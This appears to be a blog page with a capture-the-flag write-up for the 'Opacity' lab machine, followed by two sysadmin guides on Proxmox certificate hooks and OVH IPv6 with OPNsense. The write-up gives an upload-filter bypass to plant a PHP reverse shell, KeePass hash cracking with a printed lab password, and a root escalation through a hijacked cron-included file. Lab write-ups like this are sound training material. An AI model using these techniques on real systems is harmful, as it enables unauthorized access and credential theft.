Opacity (Easy)

Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.

Enumeration

Nmap

nmap -sC -sV -oN nmap-inital.txt $IP
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-10-22T07:50:10
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

From this we note that there is a login page, that the server is running PHP,
and that there is an SMB server running.

Lets start Gobuster to see if we can find anything else in the web server.

Gobuster

gobuster dir -w /opt/directory-list-2.3-medium.txt --url $IP
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 310] [--> http://10.10.21.236/css/]
/cloud                (Status: 301) [Size: 312] [--> http://10.10.21.236/cloud/]

Login page doesn’t reveal anything interesting. Neither does /css. SMBMAP also doesn’t reveal anything.

/cloud directory reveals a “5 Minute Upload” PHP application with an “External URL” field.
Some quick testing shows that it will allow for RFI. Expecting PHP rev-shell upload.

Exploit

RFI allows for uploads from attack machine. Uploads are stored in /cloud/images/ and are displayed immediately
after upload. Page appears to filter for image extensions.

/cloud/images/php-reverse-shell.php.jpg – uploads
/cloud/images/php-reverse-shell.php – fails to upload

PHP null bytes to circumvent extension.

/cloud/images/php-reverse-shell.php#00 .jpg – uploads and executes script successfully to get reverse shell as www-data.

Enumeration v2

LinPEAS

LinPEAS reports vulnerable to CVE-2021-3560, but I don’t think that’s the objective of this machine.

Further in the output I found dataset.kdbx in /opt/ which appears to be a KeePass database, which I
download to the attack machine. John has a tool to crack the hash.

keepass2john dataset.kdbx > dataset.hash
john --wordlist=/opt/rockyou.txt dataset.hash
741852963        (dataset)

Using kpcli I can open the database.

kpcli --kdb=dataset.kdbx
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root
kpcli:/Root> ls
=== Entries ===
0. user:password                                                          
kpcli:/Root> show 0

Title: user:password
Uname: sysadmin
 Pass: Cl0udP4ss40p4city#8700
  URL: 
Notes: 

kpcli:/Root> xp 0
Copied password for "user:password" to the clipboard.
sysadmin:Cl0udP4ss40p4city#8700

local.txt

We are now able to SSH into the box as the sysadmin user.

cat local.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

PrivEsc

There is a script in the sysadmin home that is owned by root and executes a backup job and some deletions. It is not in our crontab, so I’m expecting it’s in root’s. It will be our obvious point of attack.
The script is not writable, but the lib directory is, and there is a backup.inc.php file that is included from that directory.
Simply uploading a reverse shell and moving it into the lib directory with the same name as backup.inc.php will overwrite it, even without write permissions on the file. Then start your listener and wait for the cron job to fire.

# cat proof.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Proxmox VE ACME/Certbot Hooks

LetsEncrypt certificates are an easy way to help secure your Proxmox VE installation. However, sometimes you want to use them for more. In my case, I had a local service that I also wanted to use the certificate for, but when the certificate renewed the service would not restart. ACME.sh has built-in hook functionality to solve this exact need, but unfortunately It’s not easily accessed if you also want all the features of the Proxmox GUI and certificate management, since Proxmox handles all the calling to ACME and doesn’t provide a method to hook.

Of course it would be possible to use ACME independently, and then restart the needed PVE services, but I like to tinker and I wanted to find a way to go the other way; How can I keep the PVE certificate management and also restart my local service after renewal.

After a ton of Googling, I finally managed to find a solution. Proxmox VE calls the /usr/bin/pveupdate script to update certificates. This is just a Perl script, and if you scroll down you’ll find a $renew subroutine, with the lines:

print "Restarting pveproxy after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'pveproxy']);

So I took those and added:

print "Restarting myservice after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'myservice']);

A certificate renewal via the GUI now restarts my service after a certificate renewal. This functionality could be used to hook any type of action you need. The only downside, is that this script needs to be updated each time Proxmox is updated. Not the most elegant solution, but it works.

IPv6 and *sense on OVH

UPDATE 2024-08-01: Shortly after posting, OVH moved their vRack IPv6 project to Open Beta. You can now configure a routed IPv6 /56 into the vRack. While this article still applies to servers without a vRack interface, the vRack implementation doesn’t need all the hoop-jumping to work.

IPv6 is well on into deployment worldwide. According to Google, 45% of users access their services using IPv6 now. It’s more appealing than ever before to make sure you have a functional dual-stack network deployment.

This task is made difficult by some providers, whose IPv6 configurations are less than ideal (looking at you OVHCloud). Sure, in the most basic of situations may work, but anything more complex than that breaks and causes headaches. But the dual stack appeal is still there; so how do we make it work?

What is the goal?

For the purpose of this article, lets assume we’re trying to setup a dedicated Proxmox VE server with multiple VMs. Some of these VMs need to be directly accessible from the Internet, while others can be NATd. Critically, we need both IPv4 and IPv6 network stacks, particularly on the public facing services. We’re going to use OPNsense, but pfSense is similar enough that it will likely work just fine.

The problem.

The problems with OVH’s IPv6 implementation begin with the fact that they do not use prefix-delegation and they only give customers a single /64 network to work with (despite the rest of the /56 seeming to be unused). Instead of routing the entire block to your server and using PDs, they give you a fixed gateway address that’s within your /56, but outside the /64 that they assign to you. To that end, configuring devices becomes much more complicated if you’re doing anything more than setting up a single public facing server.

Additionally, their routers will not route any traffic without first receiving a Neighbour Discovery Protocol advertisement from an IPv6 address. For our use-case, this means we need to configure *sense to forward NPD packets to the LAN, or to reply to NDP packets as though it had those addresses.

Initial setup.

So lets deal with this.

The first step is getting IPv6 configured on the router. Use the web GUI to configure a Static IPv6 address on the WAN interface, within the /64 network provided by OVH. Setting up a gateway poses a bit of a challenge, because OPNsense doesn’t support far (outside the local subnet) IPv6 gateways. To add a default gateway outside the local subnet, we first have to tell the system how to reach that gateway. To do this we create an on-link route that tells the router it will find that address on the WAN interface link, using the following command:

route -6 add xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff -interface vtnet0

Make sure to replace the address with the gateway address OVH has provided you, and the interface with the interface of your WAN interface. You can then add the gateway via the web interface, or with another command:

route -6 add default xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff

These changes will disappear as soon as you restart the router, so add them into a custom rc script to have them start at boot time. /usr/local/etc/rc.d/ovhipv6

#!/bin/sh

. /etc/rc.subr

name="ovhipv6"
rcvar=ovhipv6_enable
start_cmd="${name}_start"
stop_cmd="${name}_stop"

load_rc_config $name
: ${ovhipv6_enable:=no}

ovhipv6_start()
{

        route -6 add xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff -interface vtnet0
        route -6 add default xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff

}

ovhipv6_stop()
{
        route -6 delete xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff -interface vtnet0
        route -6 delete default xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff
}

load_rc_config $name
run_rc_command "$1"

Then enable it in rc.conf by creating /etc/rc.conf.d/ovhipv6

ovhipv6_enable="YES"

You should now be able to ping -6 google.com and receive replies.

First Hiccup.

So we’ve assigned our only /64 to our WAN interface; how are we supposed to get IPv6 to our VMs behind it?

The hopeful among you might be saying “We have a router, lets route a small subset of the /64 – say a /65 – to the LAN. This does work, with an NDP proxy running to forward/reply to the NDP requests from the OVH router. I opted for a different configuration, albeit one that still requires an NDP proxy.

Using ULAs.

My solution uses Unique Local Addresses from fc00::/7 of the IPv6 address space. These addresses are supposed to be globally unique, and route-able, but are not intended for use on the open Internet.

To get a ULA you start with fd followed by 40 bits of random hex. Make sure you generate your own random 40 bits. This should get you something like fd3d:a7c3:2ef1::/48. You can then add up to another 16 bits to define your “subnet” and getting fd3d:a7c3:2ef1:1234::/64.

Configure a static address within this new subnet on the LAN interface.

So now we have a /64 for the LAN side, but OVH’s routers won’t route it; so what do we do?

NPTv6

The solution we need is NPTv6. Network Prefix Translation, “translates” one IPv6 prefix to another one. So we can tell OPNsense to translate our fd3d:a7c3:2ef1:1234::/64 prefix to the public xxxx:xxxx:xxxx:xxxx::/64 prefix that OVH provides. As IPv6 packets enter the WAN, the external prefix will be converted to our ULA one, and the packet will be routed to the local machine. The problem with translating the entire /64 is that our WAN interface is using one of the addresses in that space, and we don’t want it translated. The solution is to only translate a /65. This leaves half the network space available on the WAN interface, while anything in the other half will get converted into one of the local addresses.

xxxx:xxxx:xxxx:xxxx:: - xxxx:xxxx:xxxx:xxxx:79ff:ffff:ffff:ffff will be available on the WAN interface.

xxxx:xxxx:xxxx:xxxx:8000:: - xxxx:xxxx:xxxx:ffff:ffff:ffff:ffff will be translated to the ULA addresses.

Under Firewall > NAT > NPTv6 you can add a new rule for the WAN interface. The external prefix will be xxxx:xxxx:xxxx:xxxx:8000::/65 and the internal prefix will be fd3d:a7c3:2ef1:1234:8000::/65.

Now assign a VM on the LAN side a static address in the upper /65 of your ULA range. (anything 8000 or above in the 5th octet). You can also configure DHCPv6 if you prefer, but make sure the ranges being handed out are in the upper /65 as well, otherwise they won’t be translated to the public prefix.

You should now be able to ping the router and any other VMs on the LAN side with the ULAs assigned. If you packet capture on the WAN interface, you should see that packets from the LAN side are being translated correctly. But if you try to ping anything on the Internet side, no replies make it back. What gives?

NDP Proxy

Due to OVH’s absurd implementation of IPv6, the provided gateway will not route any IPv6 traffic until the address sending that traffic replies to a Neighbour Solicitation with a Neighbour Advertisement. NDP packets aren’t route-able so the NPTv6 won’t allow them to be translated and routed, and our router won’t reply to them, because it doesn’t have the address being solicited. If we give it the address being solicited it will break the whole setup.

The solution is ndproxy, which will reply to all NDP Solicitations from specified addresses, minus some exceptions. Since the addresses we’re using are route-able, and all the OVH gateway needs is to know the address is a neighbour, this solution works well. The problem is that ndproxy isn’t support by *sense so we have to compile it ourselves.

Compiling and configuring

Make sure you have git installed, and clone the OPNsense source as well as the upstream FreeBSD ports.

pkg install git
git clone --recurse-submodules https://github.com/opnsense/src /usr/src
git clone --recurse-submodules https://git.FreeBSD.org/ports.git /usr/ports-upstream

Move into the ndproxy directory and make and install the kernel module.

cd /usr/ports-upstream/net/ndproxy
make clean
make install

This process will have to be completed every time there is a kernel update.

ndproxy is configured with sysctl commands, but this occurs automatically on startup. To configure it we need to include the values we want in /etc/rc.conf.d/ndproxy.

# Start at boot
ndproxy_enable="YES"
# The WAN interface that will be listening for NDP Solicitations
ndproxy_uplink_interface="vtnet0"
# The MAC address of the WAN interface that will be used to fill the NDP Advertisements
ndproxy_downlink_mac_address="XX:XX:XX:XX:XX:XX"
# Addresess NOT to reply to.  Include the addresses (including link-local) of the router and any other
# system that is on the WAN side and needs to respond to it's own NDP packets. (Separate by semi-colon)
ndproxy_exception_ipv6_addresses="xxxx:xxxx:xxxx:xxxx:yyyy:yyyy:yyyy:yyyy;fe80::xxxx:xxxx:xxxx:xxxx"
# Only addresses listen below will handled by ndproxy.  So if an NDP packet is sent from an address not in this list it will not be handled.
# Put all addresses that the provider sends NDP packets from in this list. (Separate by semi-colon)
ndproxy_uplink_ipv6_addresses="xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff;xxxx:xxxx:xxxx:xxff:ff:ff:ff:fe;xxxx:xxxx:xxxx:xxff:ff:ff:ff:fd"

Start ndproxy and test.

You should now be ready to test. Start ndproxy via /usr/local/etc/rc.d/ndproxy start and begin testing. Send a ping from one of the LAN machines and you should get replies within a few seconds. If you packet capture on the WAN interface again you will see the NDP solicitations and advertisements going to and from the gateway as ndproxy replies to them.